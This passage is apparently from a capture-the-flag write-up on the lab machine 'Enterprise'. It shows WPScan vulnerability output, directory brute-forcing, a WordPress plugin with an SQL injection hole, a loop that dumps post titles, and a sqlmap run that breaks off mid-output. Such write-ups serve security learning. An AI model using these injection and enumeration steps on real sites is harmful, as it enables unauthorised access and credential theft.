| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9174
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20151
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
|
| [!] Title: WordPress <= 5.0 - File Upload to XSS on Apache Web Servers
| Fixed in: 4.8.8
| References:
| - https://wpvulndb.com/vulnerabilities/9175
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20149
| - https://wordpress.org/news/2018/12/wordpress-5-0-1-security-release/
| - https://github.com/WordPress/WordPress/commit/246a70bdbfac3bd45ff71c7941deef1bb206b19a
|
| [!] Title: WordPress 3.7-5.0 (except 4.9.9) - Authenticated Code Execution
| Fixed in: 5.0.1
| References:
| - https://wpvulndb.com/vulnerabilities/9222
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8942
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8943
| - https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/
| - https://www.rapid7.com/db/modules/exploit/multi/http/wp_crop_rce
|
| [!] Title: WordPress 3.9-5.1 - Comment Cross-Site Scripting (XSS)
| Fixed in: 4.8.9
| References:
| - https://wpvulndb.com/vulnerabilities/9230
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9787
| - https://github.com/WordPress/WordPress/commit/0292de60ec78c5a44956765189403654fe4d080b
| - https://wordpress.org/news/2019/03/wordpress-5-1-1-security-and-maintenance-release/
| - https://blog.ripstech.com/2019/wordpress-csrf-to-rce/
|
| [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
| Fixed in: 4.8.10
| References:
| - https://wpvulndb.com/vulnerabilities/9867
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
| - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
| - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
| - https://hackerone.com/reports/339483
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9908
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9909
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
| - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
| - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
|
| [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9910
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9911
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9912
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
| Fixed in: 4.8.11
| References:
| - https://wpvulndb.com/vulnerabilities/9913
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
| - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
| - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
| - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
|
| [!] Title: WordPress <= 5.3 - Authenticated Improper Access Controls in REST API
| Fixed in: 4.8.12
| References:
| - https://wpvulndb.com/vulnerabilities/9973
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
|
| [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Crafted Links
| Fixed in: 4.8.12
| References:
| - https://wpvulndb.com/vulnerabilities/9975
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://hackerone.com/reports/509930
| - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
|
| [!] Title: WordPress <= 5.3 - Authenticated Stored XSS via Block Editor Content
| Fixed in: 4.8.12
| References:
| - https://wpvulndb.com/vulnerabilities/9976
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
|
| [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
| Fixed in: 4.8.12
| References:
| - https://wpvulndb.com/vulnerabilities/10004
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
| - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
| - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
|
| [!] Title: WordPress < 5.4.1 - Password Reset Tokens Failed to Be Properly Invalidated
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10201
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11027
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47634/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-ww7v-jg8c-q6jw
|
| [!] Title: WordPress < 5.4.1 - Unauthenticated Users View Private Posts
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10202
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11028
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47635/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xhx9-759f-6p2w
|
| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in Customizer
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10203
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11025
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47633/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-4mhg-j6fx-5g3c
|
| [!] Title: WordPress < 5.4.1 - Cross-Site Scripting (XSS) in wp-object-cache
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10205
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11029
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47637/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-568w-8m88-8g2c
|
| [!] Title: WordPress < 5.4.1 - Authenticated Cross-Site Scripting (XSS) in File Uploads
| Fixed in: 4.8.13
| References:
| - https://wpvulndb.com/vulnerabilities/10206
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11026
| - https://wordpress.org/news/2020/04/wordpress-5-4-1/
| - https://core.trac.wordpress.org/changeset/47638/
| - https://www.wordfence.com/blog/2020/04/unpacking-the-7-vulnerabilities-fixed-in-todays-wordpress-5-4-1-security-update/
| - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-3gw2-4656-pfr2
[i] The main theme could not be detected.
[+] Enumerating Vulnerable Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Vulnerable Themes (via Aggressive Methods)
Checking Known Locations - Time: 00:00:02 <> (328 / 328) 100.00% Time: 00:00:02
[+] Checking Theme Versions (via Aggressive Methods)
[i] Theme(s) Identified:
[+] twentyfifteen
| Location: http://10.10.10.61/wp-content/themes/twentyfifteen/
| Latest Version: 2.6
| Last Updated: 2020-03-31T00:00:00.000Z
| Readme: http://10.10.10.61/wp-content/themes/twentyfifteen/readme.txt
| Style URL: http://10.10.10.61/wp-content/themes/twentyfifteen/style.css
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, straightforward typography is readable on a wide variety of screen sizes, and suitable for multiple languages. We designed it using a mobile-first approach, meaning your content takes center-stage, regardless of whether your visitors arrive by smartphone, tablet, laptop, or desktop computer.
| Author: the WordPress team
| Author URI: https://wordpress.org/
| License: GNU General Public License v2 or later
| License URI: http://www.gnu.org/licenses/gpl-2.0.html
| Tags: blog, two-columns, left-sidebar, accessibility-ready, custom-background, custom-colors, custom-header, custom-logo, custom-menu, editor-style, featured-images, microformats, post-formats, rtl-language-support, sticky-post, threaded-comments, translation-ready
| Text Domain: twentyfifteen
|
| Found By: Known Locations (Aggressive Detection)
| - http://10.10.10.61/wp-content/themes/twentyfifteen/, status: 200
|
| [!] 1 vulnerability identified:
|
| [!] Title: Twenty Fifteen Theme <= 1.1 - DOM Cross-Site Scripting (XSS)
| Fixed in: 1.2
| References:
| - https://wpvulndb.com/vulnerabilities/7965
| - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3429
| - https://blog.sucuri.net/2015/05/jetpack-and-twentyfifteen-vulnerable-to-dom-based-xss-millions-of-wordpress-websites-affected-millions-of-wordpress-websites-affected.html
| - https://packetstormsecurity.com/files/131802/
| - https://seclists.org/fulldisclosure/2015/May/41
|
| The version could not be determined.
[+] Enumerating Config Backups (via Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <===> (21 / 21) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[+] Enumerating DB Exports (via Aggressive Methods)
Checking DB Exports - Time: 00:00:00 <=======> (36 / 36) 100.00% Time: 00:00:00
[i] No DB Exports Found.
[+] Enumerating Medias (via Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
Brute Forcing Attachment IDs - Time: 00:00:00 <> (0 / 100) 0.00% ETA: ??:??:? Brute Forcing Attachment IDs - Time: 00:00:00 <> (1 / 100) 1.00% ETA: 00:00:1 Brute Forcing Attachment IDs - Time: 00:00:00 <> (2 / 100) 2.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (4 / 100) 4.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (6 / 100) 6.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (7 / 100) 7.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (9 / 100) 9.00% ETA: 00:00:0 Brute Forcing Attachment IDs - Time: 00:00:00 <> (11 / 100) 11.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (12 / 100) 12.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (13 / 100) 13.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (14 / 100) 14.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (15 / 100) 15.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (17 / 100) 17.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (18 / 100) 18.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (19 / 100) 19.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (20 / 100) 20.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (22 / 100) 22.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (23 / 100) 23.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (24 / 100) 24.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (25 / 100) 25.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (27 / 100) 27.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (29 / 100) 29.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (30 / 100) 30.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (31 / 100) 31.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (32 / 100) 32.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (34 / 100) 34.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (35 / 100) 35.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (36 / 100) 36.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:00 <> (38 / 100) 38.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (40 / 100) 40.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (41 / 100) 41.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (43 / 100) 43.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (45 / 100) 45.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (46 / 100) 46.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (47 / 100) 47.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (49 / 100) 49.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (51 / 100) 51.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (52 / 100) 52.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (53 / 100) 53.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (55 / 100) 55.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (56 / 100) 56.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (57 / 100) 57.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (58 / 100) 58.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (60 / 100) 60.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (61 / 100) 61.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (63 / 100) 63.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (64 / 100) 64.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (65 / 100) 65.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (67 / 100) 67.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (69 / 100) 69.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (71 / 100) 71.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (72 / 100) 72.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (73 / 100) 73.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (74 / 100) 74.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (75 / 100) 75.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (76 / 100) 76.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (77 / 100) 77.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:01 <> (79 / 100) 79.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (80 / 100) 80.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (81 / 100) 81.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:02 <> (84 / 100) 84.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:03 <> (85 / 100) 85.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:03 <> (87 / 100) 87.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:03 <> (89 / 100) 89.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:03 <> (90 / 100) 90.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:03 <> (91 / 100) 91.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:03 <> (92 / 100) 92.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:03 <> (93 / 100) 93.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:03 <> (94 / 100) 94.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:03 <> (96 / 100) 96.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:04 <> (97 / 100) 97.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:04 <> (98 / 100) 98.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:04 <> (99 / 100) 99.00% ETA: 00:00: Brute Forcing Attachment IDs - Time: 00:00:04 <> (100 / 100) 100.00% Time: 00:00:04
[i] Medias(s) Identified:
[+] http://10.10.10.61/?attachment_id=16
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=13
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=14
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=15
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=23
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] http://10.10.10.61/?attachment_id=24
| Found By: Attachment Brute Forcing (Aggressive Detection)
[+] Enumerating Users (via Aggressive Methods)
Brute Forcing Author IDs - Time: 00:00:01 <==> (10 / 10) 100.00% Time: 00:00:01
[i] User(s) Identified:
[+] william-riker
| Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
[+] WPVulnDB API OK
| Plan: free
| Requests Done (during the scan): 2
| Requests Remaining: 48
[+] Finished: Thu May 21 17:19:49 2020
[+] Requests Done: 551
[+] Cached Requests: 7
[+] Data Sent: 123.606 KB
[+] Data Received: 12.569 MB
[+] Memory used: 219.777 MB
[+] Elapsed time: 00:00:15
There are a lot of vulnerabilities because this wordpress version is very old (release date around beginning of 2014), and we found a user name.
Port 443
The SSL port seems to be the default apache page.
u505@kali:~/HTB/Machines/Enterprise$ python3 /opt/utils/dirsearch/dirsearch.py -w /usr/share/wordlists/dirb/common2.txt -e "txt,html,php,js" -r 1 -f -t 1000 -u https://enterprise.local/
_|. _ _ _ _ _ _|_ v0.3.9 (_||| _) (/_(_|| (_| )
Extensions: txt, html, php, js | HTTP method: get | Threads: 1000 | Wordlist size: 22974 | Recursion level: 1
Error Log: /opt/utils/dirsearch/logs/errors-20-05-21_17-21-40.log
Target: https://enterprise.local/
[17:21:40] Starting: [17:21:48] 403 - 297B - /.html [17:21:52] 200 - 946B - /files/ [17:21:54] 403 - 298B - /icons/ [17:21:54] 200 - 11KB - /index.html [17:21:56] 403 - 296B - /.php [17:22:03] 403 - 306B - /server-status/ [17:22:12] Starting: files/ [17:22:12] 403 - 302B - /files/.php [17:22:13] 403 - 303B - /files/.html [17:23:44] Starting: icons/ [17:23:46] 403 - 303B - /icons/.html [17:23:47] 403 - 302B - /icons/.php [17:24:38] 200 - 35KB - /icons/README.html [17:24:44] 403 - 304B - /icons/small/ [17:25:14] Starting: server-status/
Task Completed
Folder files
In the folder files, there is a zip file.
u505@kali:~/HTB/Machines/Enterprise$ wget --no-check-certificate https://enterprise.local/files/lcars.zip --2020-05-21 17:25:36-- https://enterprise.local/files/lcars.zip Resolving enterprise.local (enterprise.local)... 10.10.10.61 Connecting to enterprise.local (enterprise.local)|10.10.10.61|:443... connected. WARNING: The certificate of ‘enterprise.local’ is not trusted. WARNING: The certificate of ‘enterprise.local’ doesn't have a known issuer. WARNING: The certificate of ‘enterprise.local’ has expired. The certificate has expired HTTP request sent, awaiting response... 200 OK Length: 1406 (1.4K) [application/zip] Saving to: ‘lcars.zip’
lcars.zip 100%[===================>] 1.37K --.-KB/s in 0s
2020-05-21 17:25:44 (24.4 MB/s) - ‘lcars.zip’ saved [1406/1406]
Unzip the file
u505@kali:~/HTB/Machines/Enterprise$ unzip lcars.zip Archive: lcars.zip inflating: lcars/lcars_db.php inflating: lcars/lcars_dbpost.php inflating: lcars/lcars.php
u505@kali:~/HTB/Machines/Enterprise$ cd lcars u505@kali:~/HTB/Machines/Enterprise/lcars$ cat lcars.php <?php /* * Plugin Name: lcars * Plugin URI: enterprise.htb * Description: Library Computer Access And Retrieval System * Author: Geordi La Forge * Version: 0.2 * Author URI: enterprise.htb * */
// Need to create the user interface.
// need to finsih the db interface
// need to make it secure
?>
These files seem to be a custom plugin for Wordpress.
u505@kali:~/HTB/Machines/Enterprise/lcars$ cat lcars_db.php <?php include "/var/www/html/wp-config.php"; $db = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME); // Test the connection: if (mysqli_connect_errno()){ // Connection Error exit("Couldn't connect to the database: ".mysqli_connect_error()); }
// test to retireve an ID if (isset($_GET['query'])){ $query = $_GET['query']; $sql = "SELECT ID FROM wp_posts WHERE post_name = $query"; $result = $db->query($sql); echo $result; } else { echo "Failed to read query"; }
?>
u505@kali:~/HTB/Machines/Enterprise/lcars$ cat lcars_dbpost.php
<?php
include "/var/www/html/wp-config.php";
$db = new mysqli(DB_HOST, DB_USER, DB_PASSWORD, DB_NAME);
// Test the connection:
if (mysqli_connect_errno()){
// Connection Error
exit("Couldn't connect to the database: ".mysqli_connect_error());
}
// test to retireve a post name
if (isset($_GET['query'])){
$query = (int)$_GET['query'];
$sql = "SELECT post_title FROM wp_posts WHERE ID = $query";
$result = $db->query($sql);
if ($result){
$row = $result->fetch_row();
if (isset($row[0])){
echo $row[0];
}
}
} else {
echo "Failed to read query";
}
This plugin should be prone to SQL Injection, because no validations are done on parameter query.
Wordpress custom plugin abuse
The lcars_dbpost.php page provides the title of each post, even post that are not published, with a loop all titles can be retreived.
u505@kali:~/HTB/Machines/Enterprise$ cat listpost.sh
for i in `seq 1 100`
do
URL="http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=$i"
VAL=`curl -q http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=$i 2>/dev/null`
VAL2=`echo $VAL | grep -v "^$"`
if [ "#$VAL2#" != "##" ] ; then
echo $URL
echo $VAL2
fi
done
u505@kali:~/HTB/Machines/Enterprise$ sh listpost.sh > postlist
u505@kali:~/HTB/Machines/Enterprise$ cat postlist
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=1
Hello world!
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=3
Auto Draft
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=4
Espresso
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=5
Sandwich
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=6
Coffee
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=7
Home
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=8
About
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=9
Contact
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=10
Blog
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=11
A homepage section
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=13
enterprise_header
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=14
Espresso
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=15
Sandwich
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=16
Coffee
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=23
enterprise_header
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=24
cropped-enterprise_header-1.jpg
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=30
Home
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=34
Yelp
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=35
Facebook
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=36
Twitter
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=37
Instagram
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=38
Email
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=40
Hello world!
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=51
Stardate 49827.5
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=52
Stardate 49827.5
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=53
Stardate 50893.5
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=54
Stardate 50893.5
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=55
Stardate 52179.4
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=56
Stardate 52179.4
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=57
Stardate 55132.2
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=58
Stardate 55132.2
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=66
Passwords
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=67
Passwords
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=68
Passwords
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=69
YAYAYAYAY.
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=70
YAYAYAYAY.
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=71
test
http://enterprise.local//wp-content/plugins/lcars/lcars_dbpost.php?query=78
YAYAYAYAY.
Posts 66 to 68 seem very interresting.
SQLMap
The queries are vulnerable to SQL Injection.
u505@kali:~/HTB/Machines/Enterprise$ cat lcars_db.req GET /wp-content/plugins/lcars/lcars_db.php?query=abc HTTP/1.1 Host: enterprise.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
Databases enumeration
u505@kali:~/HTB/Machines/Enterprise$ sqlmap -r lcars_db.req --dbs
___
__H__
___ ___[)]_____ ___ ___ {1.4.5#stable}
|_ -| . ['] | .'| . |
|___|_ [']_|_|_|__,| _|
|_|V... |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 13:01:43 /2020-05-25/
[13:01:43] [INFO] parsing HTTP request from 'lcars_db.req'
[13:01:43] [INFO] resuming back-end DBMS 'mysql'
[13:01:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: query (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace (FLOOR)
